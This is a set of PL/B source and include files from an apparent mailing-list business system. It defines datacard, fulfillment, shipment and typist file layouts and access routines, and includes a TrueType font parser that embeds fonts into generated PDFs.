* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
......................................................
. LAST MODIFIED
. patch 1.4 12September2006 DLH - Fulfillment & Min Changes
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
.Secondary FIles See
. include ntxtdd.inc - DATACARD TEXT FILE
. include nadddd.inc - address codes
. include narrdd.inc - Arrangement codes
. include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
. include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
. include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
. include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIABLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
. INclude NMDCMsc.inc - additional info (currently from MIN) need to incorporate
. INClude NMDCCAT.inc - Min Category
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modified COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
. File names, file-list handles, lock mode, open flag and key
. work fields for the NINDATB master datacard file.
. NOTE(review): NDATBNME1 and NDATBNME2 are initialised to the
. same name, and NDATBNME3 is "NINDATB4" while its remark speaks
. of nindat3 -- confirm which names are actually in use.
NDATBNAME DIM 35
NDATBNME1 INIT "NINDATB "
NDATBNME2 INIT "NINDATB "
NDATBNME3 INIT "NINDATB4 " nindat3 is used for tdmc info (argh)
NDATBFLIST FILELIST
NDATBFILE IFILE KEYLEN=6,FIXED=617,Name="NINDATB.ISI|NINS1:502"
NDATBFLE3 IFILE KEYLEN=23,FIXED=617,Name="NINDATB4.ISI|NINS1:502"
.
NDATBFLE2 AFILE FIXED=617,Name="NINDATB.AAM|NINS1:502"
 FILELISTEND
NDATBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATBFLD DIM 6
NDATBFLD1 DIM 9
NDATBFLD2 DIM 78
NDATBFLD3 DIM 75
NDATBFLD4 DIM 9
NDATBFLD5 DIM 4
NDATBFLD6 DIM 4
NDATBFLD7 DIM 4
NDATBFLAG FORM 1
NDATBPATH FORM 1
.
. Record list: the shared DatVars layout (see Ndatdd.inc) plus a
. 17-byte stamp appended for this file.
DATBVARS LIST
 DatVars
.datvars - see Ndatdd.inc
NDatBStamp Dim 17
 LISTEND
<file_sep>/include/nfuldd.inc
............................................................
.
. NFULDD INCLUSION
. NIN FULFILLMENT FILE DEFINITION
.
. FILE NAME : NINFUL
. REC LENGTH: 273 FIXED
. INDEX KEY : NFULNUM
. AAMDEX KEY: NFULCOMP
. NFULCNT
. NFULTELE
.
. NOTE(review): the header lists AAMDEX key NFULTELE but the
. record below defines NFULFAX (remarked "Phone Number") at
. positions 95-104 -- confirm which name/meaning is current.
.
.18 JUN 2005 DMB IP Changed for File Manager
.16 May 2005 DLH add email
............................................................
. File handles; commented-out lines preserve the pre-File-Manager
. host address (20.20.30.103) that NINS1 replaced.
NFULLIST Filelist
.NFULFILE IFILE KEYLEN=4,FIX=273,UNCOMP,Name="NINFUL.ISI|20.20.30.103:502"
NFULFILE IFILE KEYLEN=4,FIX=273,UNCOMP,Name="NINFUL.ISI|NINS1:502"
.NFULFLE2 AFILE FIX=273,Name="NINFUL.AAM|20.20.30.103:502"
NFULFLE2 AFILE FIX=273,Name="NINFUL.AAM|NINS1:502"
 Filelistend
NFULFLSQ FILE
.NFULNAME INIT "NINFUL|20.20.30.103:502 "
NFULNAME INIT "NINFUL|NINS1:502 "
NFULFLD DIM 4
NFULFLD1 DIM 48
NFULFLD2 DIM 48
NFULFLD3 DIM 13
NFULPATH FORM 1
NFULFLAG FORM 1
NFULFLG2 FORM 1
NFULLOCK FORM 1
.
. Record layout; byte positions follow each field.
NFULVARS list
NFULNUM dim 4 1-4 .Record Num(ISAM)
NFULCOMP dim 45 5-49 .Company Name(AAM)
NFULCNT dim 45 50-94 .Contact Name(AAM)
NFULFAX dim 10 95-104 .Phone Number(AAM)
NFULDATE dim 8 105-112 .Creation Date
NFULMODDATE dim 8 113-120 .Modification Date
NFULINITS dim 3 121-123 .Initials
NFULNOTES dim 100 124-223 .Notes
NFULEmail dim 50 224-273
;NFULFill dim 50 224-273
 listend
............................................................
<file_sep>/DEVELOP/Includes - why/pdfttf.inc
.
. get information from TrueType font files
.
. This version only supports 8-bit character sets.
. TTF normally has a unicode character->glyph mapping table but as
. the PL/B language doesn't support unicode, there is no need to
. parse it.
.
. This version does not subset embedded TTF fonts.
.
.some standard windows fonts... everybody should have these so don't embed them.
.
winfontscount const "12"
winfonts dim 250(winfontscount),("C:\WINDOWS\FONTS\TIMES.TTF"):
 ("C:\WINDOWS\FONTS\TIMESBD.TTF"):
 ("C:\WINDOWS\FONTS\TIMESI.TTF"):
 ("C:\WINDOWS\FONTS\TIMESBI.TTF"):
 ("C:\WINDOWS\FONTS\ARIAL.TTF"):
 ("C:\WINDOWS\FONTS\ARIALBD.TTF"):
 ("C:\WINDOWS\FONTS\ARIALI.TTF"):
 ("C:\WINDOWS\FONTS\ARIALBI.TTF"):
 ("C:\WINDOWS\FONTS\COUR.TTF"):
 ("C:\WINDOWS\FONTS\COURBD.TTF"):
 ("C:\WINDOWS\FONTS\COURI.TTF"):
 ("C:\WINDOWS\FONTS\COURBI.TTF")
.
. Cached font attributes: one fontattr record per font file,
. keyed by hash, holding the metrics a PDF font descriptor needs.
pdfFontCache IFILE
dim260 dim 260
hash dim 16
hashkey dim 24
fontattr record
 hash dim 24
 Filename dim 260
 Name dim 80 //
 embedOK form 1
 FirstChar form "32" //
 LastChar form "255" //
 Widths form 5(0..256) //
 MissingW form 5 //
 Flags form 10 // need to parse OS/2 table to determine serif font!!
 Stemv form 2 // ?? default ??
 Ascent form 5 //
 Descent form 5 //
.capheight form 5
 Bbox record // font bounding box, PDF glyph units
 L form 5 //
 B form 5 //
 R form 5 //
 T form 5 //
 recordend
.Unicode form 1 //Font is unicode!!!
 recordend
. Overlay for a 'cmap' subtable with a 256-entry byte glyph
. array (matches TTF format 0 -- confirm against the spec).
cmap record
 format integer 2
 length integer 2
 lang integer 2
 glyphArray integer 1(0..255)
 recordend
. Overlay for a trimmed-mapping 'cmap' subtable (TTF format 6).
cmap6 record
 format integer 2
 length integer 2
 lang integer 2
 firstCode integer 2
 entryCount integer 2
 glyphArray integer 2(0..255) // hope we can do 8 bit with unicode table
 recordend
. Scratch buffers + overlay records used by the swap2/swap4
. byte-order macros below.
d2 dim 2
$2bytes record
 int1 integer 1
 int2 integer 1
 recordend
d4 dim 4
$4bytes record
 int1 integer 1
 int2 integer 1
 int3 integer 1
 int4 integer 1
 recordend
. swap2: reverse the byte order of a 2-byte integer field in
. place (TTF table data is big-endian). Uses the d2/$2bytes
. scratch overlay defined above.
. FIX: the macro parameter reference had been corrupted to
. "¶m" by an HTML-entity decoding pass ("&param" -> "&para;"
. + "m"); restored to "&param" throughout.
swap2 macro &param
 move &param,d2
 unpack d2,$2bytes
 pack d2,$2bytes.int2,$2bytes.int1
 move d2,&param
 mend
. swap4: reverse the byte order of a 4-byte integer field in
. place (TTF table data is big-endian). Uses the d4/$4bytes
. scratch overlay defined above.
. FIX: the macro parameter reference had been corrupted to
. "¶m" by an HTML-entity decoding pass ("&param" -> "&para;"
. + "m"); restored to "&param" throughout.
swap4 macro &param
 move &param,d4
 unpack d4,$4bytes
 pack d4,$4bytes.int4,$4bytes.int3,$4bytes.int2,$4bytes.int1
 move d4,&param
 mend
.
. Read TTF file directly...
. Code ported from LIBHARU hpdf_fontdef_tt.c
.
. Registry of TrueType fonts already emitted into the PDF:
. Res holds the font resource number per style variant and
. Descriptor the shared font-descriptor object number
. (presumably PDF object numbers -- see WriteBaseFont usage).
AttrIdx form 1
NumOfTTFonts form 2
TTFonts RECORD [30] //allow use of 30 TT fonts
 File dim 260
 Res form 3[0..3] // 0=plain 1=bold 2=italic 3=Bold+Italic
 Descriptor form 3
 recordend
PDFTTFont FUNCTION
filename dim 260
fsize form 3
attrib dim ^
ENTRY
.
. Load a TrueType font for use in the generated PDF.
.   filename - path to the .ttf file
.   fsize    - point size to select
.   attrib   - optional style string ("Bold", "Italic", ...), may be null
. Parses the TTF directly (port of LIBHARU hpdf_fontdef_tt.c): reads the
. head/hhea/cmap/hmtx/name/OS2 tables, builds fontattr + an 8-bit glyph
. map, caches the result in pdfFontCache, and writes the PDF font,
. font-descriptor and (if licensing allows) embedded font-file objects.
. Clears OVER on success; sets OVER and returns early if no format-0
. cmap subtable is found.
.
FontFile FILE
Header record
version integer 4
tablecnt integer 2
search integer 2
entrsel integer 2
range integer 2
recordend
.
table record (40) // up to 40 table-directory entries
tag dim 4
checksum integer 4
offset integer 4
length integer 4
recordend
.
head record
ver integer 4
rev integer 4
chk integer 4
magicnm integer 4
flags integer 2
units_p integer 2 // units per em - divisor when scaling to PDF 1000-unit glyph space
created dim 8
modified dim 8
x_min integer 2 bbox
y_min integer 2
x_max integer 2
y_max integer 2
mac_stl integer 2
low_rec_ppem integer 2
font_direction integer 2
loc_fmt integer 2
glyph_fmt integer 2
recordend
.
hhea record
ascent integer 2
descent integer 2
dim 26
h_metric integer 2 //count of hMetric entries in hmtx
recordend
.
cmapt record
version integer 2
count integer 2
recordend
savepos integer 4
cmapEnt record
platform integer 2
encoding integer 2
offset integer 4
recordend
cmapfmt integer 2
.
nametbl record
format integer 2
count integer 2
strOff integer 2
recordend
.
nameEnt record (100)
platform integer 2
encoding integer 2
language integer 2
nameID integer 2
length integer 2
offset integer 2
recordend
.
cntr integer 1
cntr1 integer 1
int2 integer 2
int2a integer 2
noffset integer 4
nlen integer 2
aoffset integer 4
alen integer 2
.
fm10 form 10
streamdat dim ^
.
.HasCmapEnc6 form 1
// Get attribute index first: AttrIdx 0=plain 1=bold 2=italic 3=bold+italic
CLEAR AttrIdx
MOVEPTR attrib,attrib
IF NOT OVER
WHEREIS "Italic",Attrib
IF NOT ZERO
ADD "2",AttrIdx
ENDIF
WHEREIS "Bold",Attrib
IF NOT ZERO
ADD "1",AttrIdx
ENDIF
ENDIF
.
. check if font already used
.
UPPERCASE Filename
FOR cntr,1,NumOfTTFonts
IF (filename=TTFonts(cntr).File)
// re-using so we know data is in the cache at this point
CALL ReadTTFCache using filename
IF ( TTFonts(cntr).Res(AttrIdx) )
// re-use existing font object for this style
SQUEEZE TTFonts(cntr).Res(AttrIdx),scratch
PACK CurFontRes,"/TF",scratch," ",scratch," 0 R"
.
PACK CurrentFont,"/TF",scratch," ",fsize," Tf"
reset page(curpage).fontres
SCAN CurFontRes,page(curpage).fontres
IF NOT EQUAL
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
ENDIF
SET usingttf
SETFLAG NOT OVER
RETURN
ELSE
// new base font object, re-use descriptor
CALL WriteBaseFont using cntr,TTFonts(cntr).Descriptor,fsize,attrib
ENDIF
GOTO LoadLocal
ENDIF
REPEAT
.
. load data from cache if we have ever used this font
. (OPEN inside ReadTTFCache raises IO if the cache doesn't exist yet)
.
EXCEPTSET nocache if io
CALL ReadTTFCache using filename
GOTO FromCache IF NOT OVER
.
. first time use, parse the TTF file for font metrix
.
nocache
EXCEPTCLEAR io
CLEAR fontattr
MOVE "32",fontattr.FirstChar
MOVE "255",fontattr.LastChar
.
. Load the header and TTF table of contents
.
MOVE filename,Fontattr.Filename
OPEN FontFile,filename,READ
READ FontFile,seq;*ABSON,Header;
swap2 Header.tablecnt
.
FOR cntr,1,Header.tablecnt
READ FontFile,seq;*ABSON,table(cntr);
swap4 table(cntr).offset
REPEAT
.
. we have the tables and they can appear in any order but they must be
. processed in a particular order due to dependencies.
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="head")
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*ABSON,head;
swap2 head.x_min
swap2 head.y_min
swap2 head.x_max
swap2 head.y_max
swap2 head.units_p
.
. // make signed and calculate pdf glyph box
. NOTE(review): the sign test here (and the five identical ones below)
. uses "> 32768"; 16-bit two's-complement negatives occupy 32768..65535,
. so the boundary value 32768 (-32768) is left unconverted.  Looks like
. it should be ">= 32768" - confirm before changing.
MOVE head.x_min,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.l = fm10 * 1000 / head.units_p
.
MOVE head.y_min,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.b = fm10 * 1000 / head.units_p
.
MOVE head.x_max,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.r = fm10 * 1000 / head.units_p
.
MOVE head.y_max,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.bbox.t = fm10 * 1000 / head.units_p
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="hhea")
REPEAT
REPOSIT FontFile,(table(cntr).offset+4)
READ FontFile,seq;*ABSON,hhea;
swap2 hhea.ascent
swap2 hhea.descent
swap2 hhea.h_metric
.
MOVE hhea.ascent,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.ascent = fm10 *1000 / head.units_p
.
MOVE hhea.descent,fm10
IF (fm10 > 32768 )
SUB "65536",fm10
ENDIF
CALC fontattr.descent = fm10 *1000 / head.units_p
.
. get char mapping (http://developer.apple.com/fonts/ttrefman/rm06/Chap6cmap.html)
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="cmap") // char -> glyph index mapping
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*ABSON,cmapt;
swap2 cmapt.version
swap2 cmapt.count
.
. locate byte encoding: scan the subtables for a format-0 (byte) cmap
.
FOR cntr1,1,cmapt.count
READ FontFile,seq;*ABSON,cmapEnt;
swap2 cmapEnt.platform
swap2 cmapEnt.encoding
swap4 cmapEnt.offset
FPOSIT FontFile,savepos
REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
READ FontFile,seq;*ABSON,cmapfmt
swap2 cmapfmt
IF ( cmapfmt = 0 )
BREAK
ENDIF
. if ( cmapfmt = 6 )
. set HasCmapEnc6
. REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
. READ FontFile,seq;*ABSON,cmap6;
. swap2 cmap6.format
. swap2 cmap6.length
. swap2 cmap6.lang
. swap2 cmap6.firstCode
. swap2 cmap6.entryCount
. IF (cmap6.entryCount > 256)
. MOVE "256",cmap6.entryCount
. ENDIF
. ENDIF
REPOSIT FontFile,savepos
REPEAT
.
. loop exhausted without BREAK -> no usable byte-encoded cmap: give up
IF ( cntr1 > cmapt.count ) //and HasCmapEnc6 = 0)
SETFLAG OVER
RETURN
ENDIF
. ELSE IF ( cntr1 > cmapt.count )
. MOVE cmap6.format,cmap.format
. move cmap6.length,cmap.length
. move cmap6.lang,cmap.length
. move cmap6.firstCode,fontattr.FirstChar
. move cmap6.firstCode,fontattr.LastChar
. Add cmap6.entryCount,fontattr.LastChar
. for cntr1,1,cmap6.entryCount
. swap2 cmap6.glyphArray(cntr1)
. move cmap6.glyphArray(cntr1),cmap.glyphArray(cntr1)
. repeat
. ELSE
.
REPOSIT FontFile,( table(cntr).offset + cmapEnt.offset )
READ FontFile,seq;*ABSON,cmap;
swap2 cmap.format
swap2 cmap.length
swap2 cmap.lang
. ENDIF
.
.
. get char widths
.
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="hmtx") // horizontal metrix...Widths
REPEAT
REPOSIT FontFile,table(cntr).offset
.
. fonts can have thousands of characters... we only want the 8 bit ansi set
.
IF (hhea.h_metric > 254 ) // only working with 8 bit characters
MOVE "254",hhea.h_metric
ENDIF
.
FOR cntr,0,hhea.h_metric
READ FontFile,seq;*ABSON,int2; // advance_width
swap2 int2
CALC fontattr.Widths(cntr) = int2 * 1000 / head.units_p
if (fontattr.Widths(cntr) )
MOVE fontattr.Widths(cntr),int2a // save in case of incomplete table
ENDIF
READ FontFile,seq;*ABSON,int2; // lsb ??
REPEAT
. short hmtx table: pad remaining width slots with the last non-zero width
if (hhea.h_metric<254)
loop
MOVE int2a,fontattr.Widths(cntr)
incr cntr
until (cntr>254)
repeat
endif
MOVE fontattr.Widths(cmap.glypharray(32)),fontattr.MissingW // just use space width for missing
IF (fontattr.widths(cmap.glypharray(105)) = fontattr.widths(cmap.glypharray(119))) // compare 'i' to 'w' for fixed
ADD "1",fontattr.Flags
ENDIF
.
. get the font name
.
FOR cntr1,1,Header.tablecnt
break if (table(cntr1).tag="name") // name and attributes
REPEAT
REPOSIT FontFile,table(cntr1).offset
.
READ FontFile,seq;*ABSON,nametbl;
swap2 nametbl.format
swap2 nametbl.count
swap2 nametbl.strOff
FOR cntr,1,nametbl.count
READ FontFile,seq;*ABSON,nameEnt(cntr);
swap2 nameEnt(cntr).platform
swap2 nameEnt(cntr).encoding
. swap2 nameEnt(cntr).language // not used
swap2 nameEnt(cntr).nameID
swap2 nameEnt(cntr).length
swap2 nameEnt(cntr).offset
// ansi name (platform 1 = Macintosh, encoding 0 = Roman; nameID 6 = PostScript name)
IF (nameEnt(cntr).platform = 1 && nameEnt(cntr).encoding = 0 && nameEnt(cntr).nameID=6 )
CALC noffset = table(cntr1).offset + nametbl.strOff + nameEnt(cntr).offset
MOVE nameEnt(cntr).length,nlen
ENDIF
// ansi attributes (nameID 2 = subfamily, e.g. "Bold Italic")
IF (nameEnt(cntr).platform = 1 && nameEnt(cntr).encoding = 0 && nameEnt(cntr).nameID=2 )
CALC aoffset = table(cntr1).offset + nametbl.strOff + nameEnt(cntr).offset
MOVE nameEnt(cntr).length,alen
ENDIF
// not doing unicode...for now
REPEAT
REPOSIT FontFile,noffset
READ FontFile,seq;*ABSON,fontattr.name;
SETLPTR fontattr.name,nlen
SQUEEZE fontattr.name,fontattr.name //remove spaces from name
.
REPOSIT FontFile,aoffset
READ FontFile,seq;*ABSON,scratch;
SETLPTR scratch,alen
WHEREIS "Bold",scratch
IF NOT ZERO
ADD "262144",fontattr.Flags // bit 19
ENDIF
WHEREIS "Italic",scratch
IF NOT ZERO
ADD "64",fontattr.Flags // bit 7
ENDIF
ADD "4",fontattr.Flags // bit 3 - symbolic ( 8bit )
//
// can we embed this font?  (OS/2 table fsType licensing bits)
//
FOR cntr,1,Header.tablecnt
BREAK IF (table(cntr).tag="OS/2")
REPEAT
REPOSIT FontFile,table(cntr).offset
READ FontFile,seq;*abson,int2; // table version
.
IF (int2=0) // http://developer.apple.com/fonts/ttrefman/rm06/Chap6OS2.html
REPOSIT FontFile,(table(cntr).offset + 7 ) //fsType
ELSE //http://www.microsoft.com/typography/otspec/os2.htm#ver
REPOSIT FontFile,(table(cntr).offset + 8 ) //fsType
ENDIF
.
CLEAR FontAttr.EmbedOK
READ FontFile,seq;*abson,int2;
swap2 int2
IF ( int2 ) // has restrictions
AND 268,int2 //( 0x100 | 0x008 | 0x004 ) embedding allowed
IF ( int2 )
SET FontAttr.EmbedOK
ENDIF
ELSE // no restrictions
SET FontAttr.EmbedOK
ENDIF
.
. never embed the stock Windows fonts (winfonts deny-list)
UPPERCASE FontAttr.Filename
SEARCH FontAttr.Filename,winfonts(1),winfontscount,int2a
IF (int2a)
CLEAR FontAttr.EmbedOK
ENDIF
..
.. this would be needed to embed font subsets
..
. FOR cntr,1,Header.tablecnt
. BREAK IF (table(cntr).tag="loca") // glyph offset table first
. REPEAT
. REPOSIT FontFile,table(cntr).offset
....
. FOR cntr,1,Header.tablecnt
. BREAK IF (table(cntr).tag="glyf") // glyphs table
. REPEAT
. IF (Head.loc_fmt=0)
. REPOSIT FontFile,( table(cntr).offset + (GlyphOffset(char)*2) + 2 )
. ELSE
. REPOSIT FontFile,( table(cntr).offset + GlyphOffset(char) + 2 )
. ENDIF
.
. WRITE the font data to the PDF
. (first persist fontattr + glyph map to the keyed font cache)
.
CLOSE FontFile
GETFILE pdfFontCache
IF NOT EQUAL
PREP pdfFontCache,"pdfFontCache","pdfFontCache","1-20","1958"
ENDIF
.
PACKKEY dim260,fontattr.Filename
.
FINDFILE fontattr.Filename,NAME=fontattr.hash
. HASH dim260,hash
. ENCODE64 hash,fontattr.hash
.
WRITE pdfFontCache;fontattr,cmap.glypharray
CLOSE pdfFontCache
.
FromCache
.
INCR NumOfTTFonts
CHOP fontattr.Filename,TTFonts(NumOfTTFonts).File
.
CALL WriteBaseFont using NumOfTTFonts,TTFonts(NumOfTTFonts).Descriptor,fsize,attrib
.
//
// font descriptor object.  WriteBaseFont reserved its object number
// (Descriptor) and left it SQUEEZEd in scratch.
MOVE ObjNum,TTFonts(NumOfTTFonts).Descriptor
.
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Type /FontDescriptor"
WRITE pdffile,seq;" /FontName /",*ll,fontattr.Name
WRITE pdffile,seq;" /ItalicAngle 0"
WRITE pdffile,seq;" /MissingWidth ",fontattr.MissingW
WRITE pdffile,seq;" /Flags ",fontattr.Flags
.
WRITE pdffile,seq;" /StemV ",fontattr.Stemv
WRITE pdffile,seq;" /Ascent ",fontattr.Ascent
WRITE pdffile,seq;" /Descent ",fontattr.Descent
WRITE pdffile,seq;" /FontBBox [",fontattr.bbox,"]"
.
IF (fontattr.embedOK)
INCR ObjNum // reserve object number for the embedded font file (FontFile2)
SQUEEZE ObjNum,scratch
WRITE pdffile,seq;" /FontFile2 ",*ll,scratch," 0 R"
ENDIF
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"endobj"
IF (fontattr.embedOK)
// font file stream object: the raw .ttf bytes, uncompressed
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
. may have come from cache to open, then read
.
FINDFILE Fontattr.Filename,filesize=fm10
DMAKE streamdat,fm10
OPEN FontFile,fontattr.Filename,READ
READ FontFile,seq;*abson,streamdat;
CLOSE FontFile
.
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Length ",fm10
WRITE pdffile,seq;" /Length1 ",fm10
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"stream"
WRITE pdffile,seq;*ll,streamdat
WRITE pdffile,seq;"endstream"
WRITE pdffile,seq;"endobj"
ENDIF
.
LoadLocal
.
. load our internal font structure (metrics used by the layout code)
.
MOVE fontattr.Descent,FontMetrics.Descender
MOVE "50",FontMetrics.ulpen
MOVE fontattr.Descent,FontMetrics.ulPos
CLEAR FontMetrics.GlyphWidths
FOR cntr,32,254
MOVE fontattr.Widths(cmap.glypharray(cntr)),FontMetrics.GlyphWidths(cntr)
REPEAT
MOVE fsize,fontsize
.
ENDSET page(curpage).fontres
APPEND CurFontRes,page(curpage).fontres
.
SET usingttf
SETFLAG NOT OVER
FUNCTIONEND
WriteBaseFont LFUNCTION
TTFNum form 2
descriptor form ^
fsize form 3
attrib dim ^
ENTRY
.
. Emit a /Type /Font /Subtype /TrueType object for TTFonts(TTFNum) at
. style AttrIdx and record its object number in Res(AttrIdx).
.   TTFNum     - index into TTFonts
.   descriptor - (by reference) FontDescriptor object number; if 0 a new
.                number is reserved here and returned to the caller
.   fsize      - point size for the CurrentFont operator
.   attrib     - optional style suffix appended to /BaseFont, may be null
. Side effects: bumps ObjNum, updates xref, sets CurFontRes/CurrentFont,
. and leaves the descriptor number SQUEEZEd in scratch for the caller.
.
cntr integer 1
INCR ObjNum // xref for font object
SQUEEZE objNum,scratch
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
MOVE ObjNum,TTFonts(TTFNum).Res(AttrIdx)
.
PACK CurFontRes,"/TF",scratch," ",scratch," 0 R"
.
PACK CurrentFont,"/TF",scratch," ",fsize," Tf"
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;"<<"
WRITE pdffile,seq;" /Type /Font"
WRITE pdffile,seq;" /Subtype /TrueType"
WRITE pdffile,seq;" /FirstChar ",fontattr.FirstChar
WRITE pdffile,seq;" /LastChar ",fontattr.LastChar
Write pdffile,seq;" /Encoding /WinAnsiEncoding"
WRITE pdffile,seq;" /BaseFont /",*ll,fontattr.Name;
MOVEPTR attrib,attrib
IF NOT OVER
IF (attrib != "")
WRITE pdffile,seq;",",attrib
ELSE
WRITE pdffile,seq;
ENDIF
ELSE
WRITE pdffile,seq;
ENDIF
WRITE pdffile,seq;" /Widths [";
FOR cntr,32,254
WRITE pdffile,seq;fontattr.Widths(cmap.glyphArray(cntr));
REPEAT
WRITE pdffile,seq;"]"
. first use of this font file: reserve a descriptor object number
IF (descriptor = 0)
INCR ObjNum
MOVE ObjNum,descriptor
ENDIF
SQUEEZE descriptor,scratch
WRITE pdffile,seq;" /FontDescriptor ",*ll,scratch," 0 R"
WRITE pdffile,seq;">>"
WRITE pdffile,seq;"endobj"
FUNCTIONEND
ReadTTFCache LFUNCTION
filename dim ^
ENTRY
.
. Load cached font metrics (fontattr + cmap.glypharray) for filename
. from the keyed pdfFontCache file.  The record key is the canonical
. name returned by FINDFILE, matching the FINDFILE NAME= used when the
. record was written.  The OPEN raises an IO exception if the cache does
. not exist yet; PDFTTFont traps that (EXCEPTSET nocache if io).
. NOTE(review): opens "pdfFontCache.isi" while the writer PREPs plain
. "pdfFontCache" - presumably the same file via the default .isi
. extension; confirm.
.
OPEN pdfFontCache,"pdfFontCache.isi"
FINDFILE filename,name=hashkey
. PACKKEY dim260,filename
. HASH dim260,hash
. ENCODE64 hash,hashkey
READ pdfFontCache,hashkey;*ll,fontattr,cmap.glypharray
FUNCTIONEND
<file_sep>/include/nshp2dd.inc
..............................................................................
.
. NSHP2DD INCLUSION
. NIN SUPPLEMENTAL SHIPMENT FILE DEFINITION
.
. FILE NAME : NINSHP2
. REC LENGTH: 1006 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.05/1/2003 ASH Created
..............................................................................
.
NSHP2FILE IFILE KEYLEN=6
.NSHPFILE IFILE KEYLEN=6,FIXED=1006
NSHP2NAME INIT "NINSHP2 "
NSHP2FLD DIM 6 key buffer (6-digit LR number)
NSHP2FLAG FORM 1 non-zero once the file has been opened
nshp2lock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
. record layout (1006 bytes fixed, key = SLRNUM2)
shp2vars list
SLRNUM2 DIM 6 001-006 LR NUMBER **KEY**
SNOTES2 DIM 500 007-506 INTERNAL SHIPPING NOTES
SNOTES2B DIM 500 507-1006 EXTERNAL SHIPPING NOTES
listend
.
..............................................................................
<file_sep>/include/NTYPIO.INC
* NTYPIO/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER TYPIST ANALYSIS FILE.
* *****************************************************************************
.
. FILE: TYPOUT
. LENGTH: 59
.COMPRESS: NONE
. TYPE: ISAM
. KEY: IDNUM,TYPE
...............................................................................
.
. ENTRY POINT : NTYPKEY
. REQUIRED : 'NTYPFLD'
. RETURNED : TYPIST DATA RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Exact ISAM key read: open on first use (NTYPFLAG set by NTYPOPEN),
. then read the record keyed by NTYPFLD into NTypDet under FILEPI.
. Fix: the original contained the statement "BRANCH NTYPFLAG TO NTYP1"
. twice in a row; the duplicate could never have any effect (same test,
. same target) and has been removed.
NTYPKEY
BRANCH NTYPFLAG TO NTYP1
CALL NTYPOPEN
NTYP1 FILEPI 1;NTYPFILE
READ NTYPFILE,NTYPFLD;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPTST
. REQUIRED : NTYPFLD
. RETURNED :
. DESCRIPTION : TEST KEY (reads into STR1 only - existence check,
. caller tests flags)
.
NTYPTST BRANCH NTYPFLAG TO NTYP2
CALL NTYPOPEN
NTYP2 FILEPI 1;NTYPFILE
READ NTYPFILE,NTYPFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NTYPKS
. REQUIRED :
. RETURNED : TYPIST DATA RECORD
. DESCRIPTION : KEY SEQUENTIAL TYPIST FILE READ
.
NTYPKS
BRANCH NTYPFLAG TO NTYP3
CALL NTYPOPEN
NTYP3 FILEPI 1;NTYPFILE
READKS NTYPFILE;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPWRT
. REQUIRED : 'NTYPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NTYPWRT
BRANCH NTYPFLAG TO NTYP5
CALL NTYPOPEN
NTYP5 FILEPI 1;NTYPFILE
WRITE NTYPFILE,NTYPFLD;NTypDet
RETURN
...............................................................................
.
. ENTRY POINT : NTYPUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE TYPIST FILE
.
NTYPUPD
BRANCH NTYPFLAG TO NTYP6
CALL NTYPOPEN
NTYP6 FILEPI 1;NTYPFILE
UPDATE NTYPFILE;NTypDet
RETURN
